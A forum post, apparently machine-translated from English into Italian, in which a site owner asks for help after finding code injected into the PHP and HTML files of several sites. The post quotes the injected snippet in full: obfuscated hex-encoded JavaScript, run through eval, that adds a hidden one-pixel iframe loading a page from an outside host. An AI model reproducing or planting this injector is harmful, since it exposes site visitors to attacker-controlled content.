Ho iniziato un argomento QUI su il sito StackOverflow, ma è stato riferito qui.
Ho ricevuto alcune informazioni lì, ma penso che sia necessario un input più approfondito. Quindi le persone speranzose qui possono aiutarti.
Ho alcuni domini che utilizzo per siti e test. La maggior parte sono ospitati con un sito di dominio ben noto, gli altri con uno piccolo.
Recentemente ho notato che il layout della mia pagina si stava esaurendo. Durante l'ispezione, ho notato che un iFrame (che non ho mai messo lì) era in esecuzione.
L'ho rimosso e ho cambiato i permessi dei miei file.
È successo di nuovo alcune volte, poi cambiato da un iFrame a un javascript. Qui è da vedere.
<?
#68c8c7# echo " <script type=\"text/javascript\" language=\"javascript\" >
asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x66,0x72,0x61,0x73,0x73,0x65,0x6c,0x74,0x2d,0x6b,0x61,0x6c,0x6f,0x72,0x61,0x6d,0x61,0x2e,0x6e,0x6c,0x2f,0x72,0x65,0x6c,0x61,0x79,0x2e,0x70,0x68,0x70,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x70,0x6f,0x73,0x69,0x74,0x69,0x6f,0x6e,0x20,0x3d,0x20,0x27,0x61,0x62,0x73,0x6f,0x6c,0x75,0x74,0x65,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x62,0x6f,0x72,0x64,0x65,0x72,0x20,0x3d,0x20,0x27,0x30,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x68,0x65,0x69,0x67,0x68,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x77,0x69,0x64,0x74,0x68,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x6c,0x65,0x66,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x74,0x6f,0x70,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x69,0x66,0x20,0x28,0x21,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x79,0x6f,0x6b,0x64,0x6a,0x27,0x29,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x77,0x72,0x69,0x74,0x65,0x28,0x27,0x3c,0x64,0x69,0x76,0x20,0x69,0x64,0x3d,0x5c,0x27,0x79,0x6f,0x6b,0x64,0x6a,0x5c,0x27,0x3e,0x3c,0x2f,0x64,0x69,0x76,0x3e,0x27,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x79,0x6f,0x6b,0x64,0x6a,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,0x6c,0x64,0x28,0x79,0x6f,0x6b,0x64,0x6a,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28,0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=34;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window[\"eval\"];}s=\"\";for(i=0;i-499!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);}}</script>";
#/68c8c7#
?>
Si noti che è uno script PHP. Direttamente nel mio codice. Ho anche la stessa cosa in HTML.
Sembra che tutti i miei siti siano stati infettati da questo o da vari tipi di questo, anche quelli non sullo stesso host.
Qualcuno può aiutarti?